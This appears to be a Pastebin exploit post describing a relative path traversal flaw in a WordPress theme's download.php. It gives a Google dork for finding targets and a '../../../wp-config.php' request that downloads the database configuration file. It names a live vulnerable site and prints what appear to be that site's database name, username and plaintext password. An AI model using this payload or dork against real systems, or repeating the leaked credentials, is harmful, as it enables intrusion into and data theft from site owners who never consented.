KingSkrupellos

WordPress 4.9.8 KingAbdullahPort KAP DB Config File Download

Mar 19th, 2019
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.62 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 4.9.8 KingAbdullahPort KAP Themes Database Configuration File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 20/03/2019
  7. # Vendor Homepages : kingabdullahport.com.sa - phoekus.com
  8. # Software Information Link :
  9. phoekus.com/webdesignandevelopmentwordpress
  10. linkedin.com/company/phoekus
  11. zoominfo.com/c/phoekus/371582770
  12. # Software Affected Version : 4.9.8
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : High
  16. # Google Dorks : inurl:/wp-content/themes/kap/
  17. intext:Site by Phoekus
  18. # Vulnerability Type :
  19. CWE-16 [ Configuration ]
  20. CWE-200 [ Information Exposure ]
  21. CWE-23 [ Relative Path Traversal ]
  22. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  23. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  24. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  25.  
  26. ############################################################################################
  27.  
  28. # Impact :
  29. ***********
  30. * WordPress 4.9.8 KingAbdullahPort KAP Themes is prone to a vulnerability that lets attackers download database config file because
  31.  
  32. the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
  33.  
  34. within the context of the web server process and obtain potentially sensitive informations.
  35.  
  36. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
  37.  
  38. to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
  39.  
  40. a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
  41.  
  42. to a location that is outside of that directory.
  43.  
  44. ############################################################################################
  45.  
  46. # Vulnerable File :
  47. ****************
  48. /download.php
  49.  
  50. # Vulnerable Parameter :
  51. **********************
  52. ?url=
  53.  
  54. # Database Configuration File Download Exploit :
  55. ********************************************
  56. /wp-content/themes/kap/download.php?url=../../../wp-config.php
  57.  
  58. Informations About MySQL Database Configuration File =>
  59. ****************************************************
  60. ** The name of the database for WordPress */
  61. define('DB_NAME', '');
  62.  
  63. /** MySQL database username */
  64. define('DB_USER', '');
  65.  
  66. /** MySQL database password */
  67. define('DB_PASSWORD', '');
  68.  
  69. /** MySQL hostname */
  70. define('DB_HOST', '');
  71.  
  72. ############################################################################################
  73.  
  74. # Example Vulnerable Sites :
  75. *************************
  76. [+] kingabdullahport.com.sa/wp-content/themes/kap/download.php?url=../../../wp-config.php
  77.  
  78. ** //
  79. /** The name of the database for WordPress
  80. */
  81. define('DB_NAME', 'kingapor_kap');
  82.  
  83. /
  84. ** MySQL database username
  85. */
  86. define('DB_USER', 'kingapor_kapusr');
  87.  
  88. /
  89. ** MySQL database password
  90. */
  91. define('DB_PASSWORD', '@teGo0Z*zZBk');
  92.  
  93. /
  94. ** MySQL hostname *
  95. /
  96. define('DB_HOST', 'localhost');
  97.  
  98. /
  99. ** Database Charset to use in creating database tables.
  100. */
  101. define('DB_CHARSET', 'utf8');
  102.  
  103. /
  104. ** The Database Collate type. Don't change this if in doubt.
  105. */
  106. define('DB_COLLATE', '');
  107.  
  108. /**#@+
  109. *
  110.  
  111. ############################################################################################
  112.  
  113. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  114.  
  115. ############################################################################################
Add Comment
Please, Sign In to add comment